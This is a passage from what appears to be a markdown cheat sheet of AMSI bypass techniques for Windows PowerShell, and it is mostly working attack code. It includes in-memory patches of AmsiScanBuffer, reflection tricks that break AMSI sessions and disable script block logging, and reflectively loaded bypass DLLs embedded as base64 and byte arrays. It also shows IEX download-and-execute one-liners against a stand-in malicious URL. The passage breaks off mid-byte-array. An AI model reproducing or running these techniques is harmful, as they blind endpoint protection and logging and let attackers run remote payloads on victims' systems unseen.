-Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\'` +* Find software from CLSID + ```ps1 + Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}' + Name Property + ---- -------- + Hosts (default) : Scanned Hosting Applications + InprocServer32 (default) : "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpOav.dll" + ``` + +## Which Endpoint Protection is Using AMSI + +Small extract from [subat0mik/whoamsi](https://github.com/subat0mik/whoamsi) - An effort to track security vendors' use of Microsoft's Antimalware Scan Interface: + +| Vendor/Product | AMSI | Date | Reference | +| -------- | -------- | -------- | -------- | +| Avast | Y | 03/20/2016 | https://forum.avast.com/index.php?topic=184491.msg1300884#msg1300884 | +| AVG | Y | 03/08/2016 | https://support.avg.com/answers?id=906b00000008oUTAAY | +| BitDefender Consumer | Y | 09/20/2016 | https://forum.bitdefender.com/index.php?/topic/72455-antimalware-scan-service/ | +| BitDefender Enterprise | Y | 05/25/2021 | https://twitter.com/Bitdefender_Ent/status/1397187195669295111?s=20 | +| Kaspersky Anti Targeted Attack Platform | Y | 10/10/2018 | https://help.kaspersky.com/KIS/2019/en-US/119653.htm | +| Symantec Advanced Threat Protection | Y | 07/15/2020 | https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/symantec-security-software/endpoint-security-and-management/endpoint-protection/all/release-notes/Whats-new-for-Symantec-Endpoint-Protection-14_3-.html | +| Microsoft Defender for Endpoint | Y | 06/09/2015 | https://www.microsoft.com/security/blog/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/ + + +# Patching amsi.dll AmsiScanBuffer by rasta-mouse + +```ps1 +$Win32 = @" + +using System; +using System.Runtime.InteropServices; + +public class Win32 { + + [DllImport("kernel32")] + public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); + + [DllImport("kernel32")] + public static extern IntPtr LoadLibrary(string name); + + [DllImport("kernel32")] + public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); + +} +"@ + +Add-Type $Win32 + +$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll") +$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer") +$p = 0 +[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p) +$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3) +[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6) +``` + +## Dont use net webclient + +> Not Working anymore, there was a patch for it + +```ps1 +$webreq = [System.Net.WebRequest]::Create(‘https://maliciousscripturl/malicious.ps1’) +$resp=$webreq.GetResponse() +$respstream=$resp.GetResponseStream() +$reader=[System.IO.StreamReader]::new($respstream) +$content=$reader.ReadToEnd() +IEX($content) +``` + +## The Short version of dont use powershell net webclient + +> Not Working anymore, there was a patch for it + +```ps1 +IEX([Net.Webclient]::new().DownloadString("https://maliciousscripturl/malicious.ps1")) +``` + +# Amsi ScanBuffer Patch + +Egghunter with blog post: https://www.contextis.com/us/blog/amsi-bypass + +```ps1 +Write-Host "-- AMSI Patch" +Write-Host "-- Paul Laîné (@am0nsec)" +Write-Host "" + +$Kernel32 = @" +using System; +using System.Runtime.InteropServices; + +public class Kernel32 { + [DllImport("kernel32")] + public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName); + + [DllImport("kernel32")] + public static extern IntPtr LoadLibrary(string lpLibFileName); + + [DllImport("kernel32")] + public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); +} +"@ + +Add-Type $Kernel32 + +Class Hunter { + static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) { + while ($true) { + [int]$count = 0 + + while ($true) { + [IntPtr]$address = [IntPtr]::Add($address, 1) + If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) { + $count++ + If ($count -eq $egg.Length) { + return [IntPtr]::Subtract($address, $egg.Length - 1) + } + } Else { break } + } + } + + return $address + } +} + +[IntPtr]$hModule = [Kernel32]::LoadLibrary("amsi.dll") +Write-Host "[+] AMSI DLL Handle: $hModule" + +[IntPtr]$dllCanUnloadNowAddress = [Kernel32]::GetProcAddress($hModule, "DllCanUnloadNow") +Write-Host "[+] DllCanUnloadNow address: $dllCanUnloadNowAddress" + +If ([IntPtr]::Size -eq 8) { + Write-Host "[+] 64-bits process" + [byte[]]$egg = [byte[]] ( + 0x4C, 0x8B, 0xDC, # mov r11,rsp + 0x49, 0x89, 0x5B, 0x08, # mov qword ptr [r11+8],rbx + 0x49, 0x89, 0x6B, 0x10, # mov qword ptr [r11+10h],rbp + 0x49, 0x89, 0x73, 0x18, # mov qword ptr [r11+18h],rsi + 0x57, # push rdi + 0x41, 0x56, # push r14 + 0x41, 0x57, # push r15 + 0x48, 0x83, 0xEC, 0x70 # sub rsp,70h + ) +} Else { + Write-Host "[+] 32-bits process" + [byte[]]$egg = [byte[]] ( + 0x8B, 0xFF, # mov edi,edi + 0x55, # push ebp + 0x8B, 0xEC, # mov ebp,esp + 0x83, 0xEC, 0x18, # sub esp,18h + 0x53, # push ebx + 0x56 # push esi + ) +} +[IntPtr]$targetedAddress = [Hunter]::FindAddress($dllCanUnloadNowAddress, $egg) +Write-Host "[+] Targeted address: $targetedAddress" + +$oldProtectionBuffer = 0 +[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null + +$patch = [byte[]] ( + 0x31, 0xC0, # xor rax, rax + 0xC3 # ret +) +[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3) + +$a = 0 +[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null +``` + +# Forcing an error + +```ps1 +$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076) + +[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem) +``` + +# Disable Script Logging + +```ps1 +$settings = [Ref].Assembly.GetType("System.Management.Automation.Utils").GetField("cachedGroupPolicySettings","NonPublic,Static").GetValue($null); +$settings["HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"] = @{} +$settings["HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"].Add("EnableScriptBlockLogging", "0") +``` + +```ps1 +[Ref].Assembly.GetType("System.Management.Automation.ScriptBlock").GetField("signatures","NonPublic,static").SetValue($null, (New-Object 'System.Collections.Generic.HashSet[string]')) +``` + +# Amsi Buffer Patch - In memory + +```ps1 +function Bypass-AMSI +{ + if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String("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YXJkAERpc2FibGUAUnVudGltZUZpZWxkSGFuZGxlAENvbnNvbGUAaE1vZHVsZQBwcm9jTmFtZQBuYW1lAFdyaXRlTGluZQBWYWx1ZVR5cGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5SW5mb3JtYXRpb25hbFZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBCeXRlAGR3U2l6ZQBzaXplAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAQWxsb2NIR2xvYmFsAE1hcnNoYWwAS2VybmVsMzIuZGxsAEFtc2lCeXBhc3MuZGxsAFN5c3RlbQBTeXN0ZW0uUmVmbGVjdGlvbgBvcF9BZGRpdGlvbgBaZXJvAC5jdG9yAFVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAFJ1bnRpbWVIZWxwZXJzAEFtc2lCeXBhc3MAR2V0UHJvY0FkZHJlc3MAbHBBZGRyZXNzAE9iamVjdABscGZsT2xkUHJvdGVjdABWaXJ0dWFsUHJvdGVjdABmbE5ld1Byb3RlY3QAb3BfRXhwbGljaXQAZGVzdABJbml0aWFsaXplQXJyYXkAQ29weQBMb2FkTGlicmFyeQBSdGxNb3ZlTWVtb3J5AG9wX0VxdWFsaXR5AAARYQBtAHMAaQAuAGQAbABsAABXRQBSAFIATwBSADoAIABDAG8AdQBsAGQAIABuAG8AdAAgAHIAZQB0AHIAaQBlAHYAZQAgAGEAbQBzAGkALgBkAGwAbAAgAHAA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")) | Out-Null + Write-Output "DLL has been reflected"; + } + [Bypass.AMSI]::Patch() +} +``` + +# Same as 6 but integer Bytes instead of Base64 + +```ps1 +function MyPatch{ + if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) { + [Reflection.Assembly]::Load([byte[]]@(77, 90, 144, 0, 3, 0, 0, 0, 4, 0, 0, 0, 255, 255, 0, 0, 184, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 14, 31, 186, 14, 0, 180, 9, 205, 33, 184, 1, 76, 205, 33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111, 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46, 13, 13, 10, 36, 0, 0, 0, 0, 0, 0, 0, 80, 69, 0, 0, 76, 1, 3, 0, 27, 37, 18, 183, 0, 0, 0, 0, 0, 0, 0, 0, 224, 0, 34, 32, 11, 1, 48, 0, 0, 14, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 94, 44, 0, 0, 0, 32, 0, 0, 0, 64, 0, 0, 0, 0, 0, 16, 0, 32, 0, 0, 0, 2, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 3, 0, 64, 133, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 44, 0, 0, 79, 0, 0, 0, 0, 64, 0, 0, 48, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 96, 0, 0, 12, 0, 0, 0, 44, 43, 0, 0, 84, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 32, 0, 0, 72, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 46, 116, 101, 120, 116, 0, 0, 0, 108, 12, 0, 0, 0, 32, 0, 0, 0, 14, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 96, 46, 114, 115, 114, 99, 0, 0, 0, 48, 3, 0, 0, 0, 64, 0, 0, 0, 4, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 64, 46, 114, 101, 108, 111, 99, 0, 0, 12, 0, 0, 0, 0, 96, 0, 0, 0, 2, 0, 0, 0, 20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 63, 44, 0, 0, 0, 0, 0, 0, 72, 0, 0, 0, 2, 0, 5, 0, 64, 33, 0, 0, 236, 9, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 19, 48, 4, 0, 217, 0, 0, 0, 1, 0, 0, 17, 0, 114, 1, 0, 0, 112, 40, 1, 0, 0, 6, 10, 6, 126, 12, 0, 0, 10, 40, 13, 0, 0, 10, 19, 6, 17, 6, 44, 20, 0, 114, 19, 0, 0, 112, 40, 14, 0, 0, 10, 0, 23, 19, 7, 56, 165, 0, 0, 0, 6, 114, 107, 0, 0, 112, 40, 2, 0, 0, 6, 11, 7, 126, 12, 0, 0, 10, 40, 13, 0, 0, 10, 19, 8, 17, 8, 44, 17, 0, 114, 137, 0, 0, 112, 40, 14, 0, 0, 10, 0, 23, 19, 7, 43, 119, 26, 106, 40, 15, 0, 0, 10, 12, 22, 13, 7, 8, 31, 64, 18, 3, 40, 3, 0, 0, 6, 22, 254, 1, 19, 9, 17, 9, 44, 17, 0, 114, 255, 0, 0, 112, 40, 14, 0, 0, 10, 0, 23, 19, 7, 43, 72, 25, 141, 18, 0, 0, 1, 37, 208, 1, 0, 0, 4, 40, 16, 0, 0, 10, 19, 4, 25, 40, 17, 0, 0, 10, 19, 5, 17, 4, 22, 17, 5, 25, 40, 18, 0, 0, 10, 0, 7, 31, 27, 40, 19, 0, 0, 10, 17, 5, 25, 40, 4, 0, 0, 6, 0, 114, 117, 1, 0, 112, 40, 14, 0, 0, 10, 0, 22, 19, 7, 43, 0, 17, 7, 42, 34, 2, 40, 20, 0, 0, 10, 0, 42, 0, 0, 66, 83, 74, 66, 1, 0, 1, 0, 0, 0, 0, 0, 12, 0, 0, 0, 118, 52, 46, 48, 46, 51, 48, 51, 49, 57, 0, 0, 0, 0, 5, 0, 108, 0, 0, 0, 212, 2, 0, 0, 35, 126, 0, 0, 64, 3, 0, 0, 176, 3, 0, 0, 35, 83, 116, 114, 105, 110, 103, 115, 0, 0, 0, 0, 240, 6, 0, 0, 204, 1, 0, 0, 35, 85, 83, 0, 188, 8, 0, 0, 16, 0, 0, 0, 35, 71, 85, 73, 68, 0, 0, 0, 204, 8, 0, 0, 32, 1, 0, 0, 35, 66, 108, 111, 98, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 1, 87, 149, 2, 52, 9, 2, 0, 0, 0, 250, 1, 51, 0, 22, 0, 0, 1, 0, 0, 0, 22, 0, 0, 0, 4, 0, 0, 0, 1, 0, 0, 0, 6, 0, 0, 0, 10, 0, 0, 0, 20, 0, 0, 0, 11, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 2, 0, 0, 0, 4, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 85, 2, 1, 0, 0, 0, 0, 0, 6, 0, 141, 1, 206, 2, 6, 0, 223, 1, 206, 2, 6, 0, 231, 0, 156, 2, 15, 0, 238, 2, 0, 0, 6, 0, 18, 1, 14, 2, 6, 0, 198, 1, 107, 2, 6, 0, 110, 1, 107, 2, 6, 0, 43, 1, 107, 2, 6, 0, 72, 1, 107, 2, 6, 0, 173, 1, 107, 2, 6, 0, 251, 0, 107, 2, 6, 0, 48, 3, 100, 2, 6, 0, 204, 0, 206, 2, 6, 0, 194, 0, 100, 2, 6, 0, 149, 2, 100, 2, 6, 0, 154, 0, 100, 2, 6, 0, 148, 2, 100, 2, 6, 0, 253, 1, 100, 2, 6, 0, 253, 2, 206, 2, 6, 0, 125, 3, 100, 2, 6, 0, 135, 0, 100, 2, 6, 0, 64, 2, 175, 2, 0, 0, 0, 0, 38, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 16, 0, 46, 2, 16, 3, 49, 0, 1, 0, 1, 0, 0, 1, 0, 0, 47, 0, 0, 0, 49, 0, 1, 0, 7, 0, 19, 1, 0, 0, 10, 0, 0, 0, 57, 0, 2, 0, 7, 0, 51, 1, 78, 0, 91, 0, 0, 0, 0, 0, 128, 0, 150, 32, 136, 3, 95, 0, 1, 0, 0, 0, 0, 0, 128, 0, 150, 32, 23, 3, 100, 0, 2, 0, 0, 0, 0, 0, 128, 0, 150, 32, 70, 3, 106, 0, 4, 0, 0, 0, 0, 0, 128, 0, 145, 32, 151, 3, 115, 0, 8, 0, 80, 32, 0, 0, 0, 0, 150, 0, 40, 2, 122, 0, 11, 0, 53, 33, 0, 0, 0, 0, 134, 24, 142, 2, 6, 0, 11, 0, 0, 0, 1, 0, 179, 0, 0, 0, 1, 0, 162, 0, 0, 0, 2, 0, 170, 0, 0, 0, 1, 0, 38, 3, 0, 0, 2, 0, 2, 2, 0, 0, 3, 0, 85, 3, 2, 0, 4, 0, 55, 3, 0, 0, 1, 0, 